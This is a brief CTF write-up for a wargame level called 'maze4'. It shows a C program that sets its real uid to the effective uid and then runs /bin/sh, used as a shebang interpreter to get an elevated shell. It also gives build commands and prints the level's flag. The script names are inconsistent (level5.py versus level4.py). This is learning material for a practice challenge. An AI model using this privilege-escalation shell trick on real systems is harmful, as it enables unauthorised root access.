maze4

in this challenge we override one address, and put there value that will fit our needs. also, we need to give short script in bash that will open shell, i do it using the following commands:

#include <stdio.h>
#include<unistd.h>


int main(){
	
	printf("effective user id: %d\n", geteuid());
    printf("real user id: %d\n", getuid());

    setreuid(geteuid(), geteuid());

    char path[256] = "/bin/sh";
    char* argv[2];
    argv[0] = path;
    argv[1] = NULL;
    execv(path,argv);

    return 0;
}

, we will use this file as shebang.

then, we need to put the payload into our file, lets say it’s input python3 level5.py > input and of course, change to executable chmod +x input.

the whole process:

cat > code.c
gcc -m32 code.c -o code

python3 level4.py > input
chmod +x input

Flag: fobwgnzRy0

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.